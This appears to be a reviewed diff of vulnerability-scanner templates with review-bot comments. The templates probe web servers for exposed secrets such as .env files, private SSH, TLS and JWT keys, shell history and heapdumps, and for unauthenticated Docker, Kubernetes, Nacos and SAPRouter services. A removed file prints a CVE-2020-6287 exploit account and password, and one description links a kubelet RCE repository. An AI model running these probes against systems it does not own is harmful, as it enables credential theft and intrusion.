severity: medium
|
||||
tags: config,exposure,svn
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: git-config
|
|||
|
||||
info:
|
||||
name: Git Config Disclosure
|
||||
author: pdteam & pikpikcu
|
||||
author: pdteam,pikpikcu
|
||||
severity: medium
|
||||
description: Searches for the pattern /.git/config on passed URLs.
|
||||
tags: config,git,exposure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: laravel-env
|
|||
|
||||
info:
|
||||
name: Laravel .env file accessible
|
||||
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
|
||||
author: pxmme1337,dwisiswant0,geeknik,emenalf
|
||||
severity: critical
|
||||
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
|
||||
reference: https://laravel.com/docs/master/configuration#environment-configuration
|
||||
|
|
|
@ -2,7 +2,7 @@ id: package-json
|
|||
|
||||
info:
|
||||
name: npm package.json disclosure
|
||||
author: geeknik & afaq
|
||||
author: geeknik,afaq
|
||||
severity: info
|
||||
description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
|
||||
tags: config,exposure
|
||||
|
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
|||
|
||||
info:
|
||||
name: phpinfo Disclosure
|
||||
author: pdteam & daffainfo & meme-lord
|
||||
author: pdteam,daffainfo,meme-lord
|
||||
severity: low
|
||||
tags: config,exposure
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: rails-database-config
|
|||
|
||||
info:
|
||||
name: Ruby-on-Rails Database Configuration Exposure
|
||||
author: pdteam & geeknik
|
||||
author: pdteam,geeknik
|
||||
severity: low
|
||||
tags: config,exposure,rails
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: server-private-keys
|
||||
|
||||
info:
|
||||
name: Detect Private SSH and TLS Keys
|
||||
name: Detect Private SSH, TLS, and JWT Keys
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: config,exposure
|
||||
|
@ -25,6 +25,10 @@ requests:
|
|||
- "{{BaseURL}}/.ssh/id_dsa"
|
||||
- "{{BaseURL}}/{{Hostname}}.key"
|
||||
- "{{BaseURL}}/{{Hostname}}.pem"
|
||||
- "{{BaseURL}}/config/jwt/private.pem"
|
||||
- "{{BaseURL}}/jwt/private.pem"
|
||||
- "{{BaseURL}}/var/jwt/private.pem"
|
||||
- "{{BaseURL}}/private.pem"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: shellscripts
|
||||
|
||||
info:
|
||||
name: Published shellscripts
|
||||
name: Public shellscripts
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
severity: low
|
||||
tags: bash,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,17 +26,24 @@ requests:
|
|||
- "{{BaseURL}}/wp-setup.sh"
|
||||
- "{{BaseURL}}/deploy.sh"
|
||||
- "{{BaseURL}}/aws.sh"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-sh"
|
||||
- "text/plain"
|
||||
- "text/x-sh"
|
||||
part: header
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- ".*?bin.*?sh"
|
||||
- ".*?bin.*?bash"
|
||||
part: body
|
||||
condition: or
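Review bot: the new body regex `.*?bin.*?sh` matches any body containing `bin` followed anywhere by `sh` (a path like `/cabinet/refresh` qualifies), and `.*?bin.*?bash` is subsumed by it; anchor on the shebang instead, e.g. `(?m)^#!\s*/(usr/)?bin/(ba)?sh`. Likewise `text/plain` in the header list under `condition: or` accepts almost any text response, so the content-type matcher adds little once it is included.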
|
|
@ -1,7 +1,7 @@
|
|||
id: error-logs
|
||||
info:
|
||||
name: common error log files
|
||||
author: geeknik & daffainfo
|
||||
author: geeknik,daffainfo
|
||||
severity: low
|
||||
tags: logs,exposure
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: laravel-log-file
|
|||
|
||||
info:
|
||||
name: Laravel log file publicly accessible
|
||||
author: sheikhrishad & geeknik
|
||||
author: sheikhrishad,geeknik
|
||||
severity: high
|
||||
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
|
||||
reference: https://laravel.com/docs/master/logging
|
||||
|
|
|
@ -2,7 +2,7 @@ id: generic-tokens
|
|||
|
||||
info:
|
||||
name: Generic Tokens
|
||||
author: nadino & geeknik
|
||||
author: nadino,geeknik
|
||||
severity: info
|
||||
tags: exposure,token
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ id: fcm-server-key
|
|||
|
||||
info:
|
||||
name: FCM Server Key
|
||||
author: Abss (@absshax)
|
||||
author: absshax
|
||||
severity: high
|
||||
tags: exposure,token,google
|
||||
reference: https://abss.me/posts/fcm-takeover
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: adminer-panel-fuzz
|
||||
info:
|
||||
name: Adminer Login Panel Fuzz
|
||||
author: random-robbie & meme-lord
|
||||
author: random_robbie,meme-lord
|
||||
severity: info
|
||||
reference: https://blog.sorcery.ie/posts/adminer/
|
||||
tags: fuzz,adminer
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: generic-lfi-fuzzing
|
||||
info:
|
||||
name: Generic LFI Test
|
||||
author: geeknik & unstabl3
|
||||
author: geeknik,unstabl3
|
||||
severity: high
|
||||
description: A generic test for Local File Inclusion
|
||||
tags: fuzz,lfi
|
||||
|
|
|
@ -1 +0,0 @@
|
|||
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>
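Review bot: removing `helpers/payloads/CVE-2020-6287.xml` is consistent with the CVE-2020-6287 template now carrying the payload inline as base64, but check that no other template or workflow still points at this path. The deleted file also shows that the old account (`projectdiscover` / `proj3ctD1$c0v3ry`) differs from the one in the new template's comments, so anyone cleaning up after earlier scans needs both user names.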
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apple app site association for harvesting end points
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -11,16 +12,25 @@ requests:
|
|||
- "{{BaseURL}}/.well-known/apple-app-site-association"
|
||||
- "{{BaseURL}}/well-known/apple-app-site-association"
|
||||
- "{{BaseURL}}/apple-app-site-association"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
|
||||
max-redirects: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)'
|
||||
- type: word
|
||||
words:
|
||||
- 'applinks'
|
||||
- 'appID'
|
||||
- 'paths'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
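Review bot: the regex `(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)` is a hand-written case-insensitive match; `(?i)applinks` says the same thing. Under `matchers-condition: and` it also overlaps the new word matcher, which already requires `applinks`, so one of the two is redundant. The hunk shows both `max-redirects: 2` and `max-redirects: 1`; make sure only one remains in the file.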
|
|
@ -2,7 +2,7 @@ id: dir-listing
|
|||
|
||||
info:
|
||||
name: Directory listing enabled
|
||||
author: _harleo & pentest_swissky
|
||||
author: _harleo,pentest_swissky
|
||||
severity: info
|
||||
tags: misc
|
||||
|
||||
|
|
|
@ -1,20 +1,16 @@
|
|||
id: email-address-extraction
|
||||
id: email-extractor
|
||||
|
||||
info:
|
||||
name: Extract Email addresses
|
||||
name: Email Extractor
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc,email
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)"
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
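Review bot: renaming the id from `email-address-extraction` to `email-extractor` changes the identifier filters key on, as with the other id renames in this commit. In the regex, the dots inside `co.uk`, `com.mx` and the other two-part TLDs are unescaped and match any character; escape them (`co\.uk`) or replace the fixed list with a general pattern such as `[.][a-zA-Z]{2,}(?:[.][a-zA-Z]{2})?`. The extractor at the end of the hunk shows no `regex:`; confirm it still carries one in the surrounding lines.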
|
|
@ -2,7 +2,7 @@ id: aem-groovyconsole
|
|||
|
||||
info:
|
||||
name: AEM Groovy console enabled
|
||||
author: twitter.com/Dheerajmadhukar
|
||||
author: Dheerajmadhukar
|
||||
severity: critical
|
||||
description: Groovy console is exposed, RCE is possible.
|
||||
reference: https://hackerone.com/reports/672243
|
||||
|
|
|
@ -1,27 +1,29 @@
id: artifactory-anonymous-deploy

info:
name: Artifactory repos with anonymous deploy permissions
name: Artifactory anonymous deploy
reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html
author: panch0r3d
severity: high
tags: artifactory

requests:
- method: GET
path:
- "{{BaseURL}}/artifactory/ui/repodata?deploy=true"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"

matchers-condition: and
matchers:
- type: regex
regex:
- '(repoList).*?["].*["]'
- '(repoTypesList).*?["].*["]'
- type: word
words:
- '"repoKey"'
part: body
extractors:
- type: regex
part: body
regex:
- '(repoTypesList).*?["].*["]'
- '(repoList).*?["].*["]'

- type: status
status:
- 200

- type: word
words:
- "application/json"
part: header
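Review bot: the `extractors:` block sits between the `"repoKey"` word matcher and the `- type: status` matcher. Indentation is lost in this rendering, but if `extractors:` is a sibling of `matchers:`, the status and `application/json` header matchers that follow it are parsed as extractor entries (there is no status extractor type, so validation fails), and the template no longer requires status 200 or a JSON content type even though `matchers-condition: and` suggests it should. Move `extractors:` after the last matcher. The extractor also duplicates the two matcher regexes in reverse order, and `.*["]` is greedy, so each extracted value runs to the last quote on the line rather than to the closing quote of the key.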
@ -2,7 +2,7 @@ id: django-debug

info:
name: Django Debug Method Enabled
author: dhiyaneshDK & hackergautam
author: dhiyaneshDK,hackergautam
severity: medium
tags: django,debug

@ -1,7 +1,7 @@
id: druid-monitor
info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
author: ohlinge
severity: high
tags: druid,unauth

|
@ -2,7 +2,7 @@ id: exposed-docker-api
|
|||
|
||||
info:
|
||||
name: Exposed Docker API
|
||||
author: furkansenan & dwisiswant0
|
||||
author: furkansenan,dwisiswant0
|
||||
severity: info
|
||||
tags: docker,unauth,devops
|
||||
|
||||
|
|
|
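Review bot: `severity: info` is inconsistent with the `unauth` tag and the name. An unauthenticated Docker Engine API gives full control of the host, so if the matcher confirms the API answers without authentication this should be rated like `kubernetes-pods-api` in this same commit (`critical`); if it only fingerprints the service, rename it so the name does not claim exposure.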
@ -1,27 +0,0 @@
id: firebase-urls

info:
name: Find firebaseio urls to check for security permissions
author: panch0r3d
severity: info

requests:
- method: GET
path:
- "{{BaseURL}}/"
redirects: true
max-redirects: 5
headers:
User-Agent: "Mozilla UACanary12345"
matchers-condition: and
matchers:
- type: regex
regex:
- ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
part: body
extractors:
- type: regex
part: body
regex:
- "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
- "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
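Review bot: deleting is the right call for these patterns as written, but the loss of coverage belongs in the commit message. `(f|F)(i|I)...` spells out case-insensitivity that `(?i)` expresses in one token, the `.*?` at both ends of the matcher regex is a no-op in an unanchored search, and the second extractor fires on any body containing the word `database`, which makes its output noise. If surfacing Firebase references is still wanted, a replacement should match `(?i)[a-z0-9-]+\.firebaseio\.com` and drop the `database` extractor.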
@ -2,7 +2,7 @@ id: front-page-misconfig

info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications

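Review bot: `name:` still reads `discloure`; since this hunk already touches the `info:` block, fix the typo to `disclosure` in the same change.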
@ -2,7 +2,7 @@ id: java-melody-exposed

info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK & thomas_from_offensity
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
reference: |
@ -2,7 +2,7 @@ id: kubernetes-pods-api

info:
name: Kubernetes Pods API
author: ilovebinbash & geeknik & 0xtavian
author: ilovebinbash,geeknik,0xtavian
severity: critical
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/
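Review bot: the `description:` embeds a second URL (`See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.`). `reference:` accepts a list, so move that URL there alongside the binaryedge post and keep the description to what the template detects: a pods API endpoint reachable on the service port without authentication.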
@ -0,0 +1,25 @@
id: sap-netweaver-info-leak

info:
name: SAP NetWeaver ICM Info page leak
author: randomstr1ng
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
severity: medium
tags: sap,exposure

requests:
- method: GET
path:
- "{{BaseURL}}/sap/public/info"

matchers:
- type: regex
part: body
regex:
- "RFC_SYSTEM_INFO.Response"

extractors:
- type: regex
part: body
regex:
- "<RFCDEST>.*</RFCDEST>"
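Review bot: the matcher pattern `RFC_SYSTEM_INFO.Response` is a literal with one unescaped `.`; a `type: word` matcher with that string in `words:` says what is meant, or escape it as `RFC_SYSTEM_INFO\.Response`. The `description:` says `/public/info` while the request path is `/sap/public/info`; align them, and add a `reference:` for the ICM info page, since this new template ships with none.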
@ -2,7 +2,7 @@ id: server-status-localhost

info:
name: Server Status Disclosure
author: pdteam & geeknik
author: pdteam,geeknik
severity: low
tags: apache,debug

@ -2,7 +2,7 @@ id: shell-history

info:
name: Shell History
author: pentest_swissky & geeknik
author: pentest_swissky,geeknik
severity: low
description: Discover history for bash, ksh, sh, and zsh
tags: config
@ -2,7 +2,7 @@ id: springboot-configprops

info:
name: Detect Springboot Configprops Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: springboot-env

info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: springboot-heapdump

info:
name: Detect Springboot Heapdump Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: springboot-httptrace

info:
name: Detect Springboot httptrace
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: springboot-loggers

info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
tags: springboot,disclosure

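Review bot: this is the only template in the springboot series touched here without a `description:`. Its siblings each state what is exposed (`Sensitive environment variables may not be masked`, `Additional routes may be displayed`); add the equivalent for the loggers actuator, since the `disclosure` tag alone does not tell a reader why the endpoint is reported.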
@ -2,7 +2,7 @@ id: springboot-mappings

info:
name: Detect Springboot Mappings Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: springboot-trace

info:
name: Detect Springboot Trace Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
@ -2,7 +2,7 @@ id: unauthenticated-nacos-access

info:
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
author: taielab,pikpikcu
severity: critical
issues: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth
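Review bot: `issues:` is not the key used anywhere else in the `info:` block; every other template in this commit records its URL under `reference:`. Rename it so the link is handled like the others.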
@ -0,0 +1,24 @@
id: sap-router-info-leak

info:
name: SAPRouter - Routing information leak
author: randomstr1ng
severity: critical
tags: network,sap

network:
- inputs:
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
type: hex

host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 2048

matchers:
- type: word
words:
- "Routtab"
- "Working directory"
- "SAProuter Connection Table"
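Review bot: a `severity: critical` network template with no `description:` or `reference:`. State what the matched strings indicate (the router's connection table and working directory are returned to an unauthenticated client) and document the hex payload, whose ASCII `ROUTER_ADM` is readable but whose length prefix and trailing fields are not. The three `words:` are matched with the default `or` condition, so `Working directory` alone is enough to report a finding; if that is intended, say so, otherwise add `condition: and` or drop the generic string.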
@ -0,0 +1,22 @@
id: sap-router

info:
name: SAPRouter Detection
author: randomstr1ng
severity: info
tags: network,sap

network:
- inputs:
- data: 57484f415245594f553f0a
type: hex

host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 1024

matchers:
- type: word
words:
- "SAProuter"
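Review bot: document the probe. The hex decodes to the plain text `WHOAREYOU?` followed by a newline, and the single `SAProuter` word match is the whole detection; a one-line `description:` saying so saves the next reader from decoding it, and a `reference:` to the SAProuter documentation would justify the `3299` default in `host:`.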
@ -2,7 +2,7 @@ id: unauth-ftp

info:
name: FTP Anonymous Login
author: Celesian ( @C3l3si4n )
author: C3l3si4n
severity: medium
reference: https://tools.ietf.org/html/rfc2577
tags: network,ftp
@ -2,7 +2,7 @@ id: acquia-takeover

info:
name: Acquia Takeover Detection
author: pdcommunity
author: pdteam
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
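Review bot: `severity: info` while every other takeover template in this commit is `high`. If the matcher confirms a dangling Acquia CNAME the same way the others do, align the severity; if it only detects Acquia hosting, the name `Acquia Takeover Detection` overstates what it finds.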
@ -2,7 +2,7 @@ id: aftership-takeover

info:
name: Aftership Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: agilecrm-takeover

info:
name: agilecrm takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
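Review bot: `name: agilecrm takeover detection` is lowercase while the sibling templates use title case (`Aha Takeover Detection`); `brightcove takeover detection` later in this commit has the same issue. Use `Agile CRM Takeover Detection` here and `Brightcove Takeover Detection` there.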
@ -2,7 +2,7 @@ id: aha-takeover

info:
name: Aha Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: airee-takeover

info:
name: Airee Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: anima-takeover

info:
name: Anima Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: aws-bucket-takeover

info:
name: AWS Bucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover,aws
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: bigcartel-takeover

info:
name: Bigcartel Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: bitbucket-takeover

info:
name: Bitbucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -2,7 +2,7 @@ id: brightcove-takeover

info:
name: brightcove takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz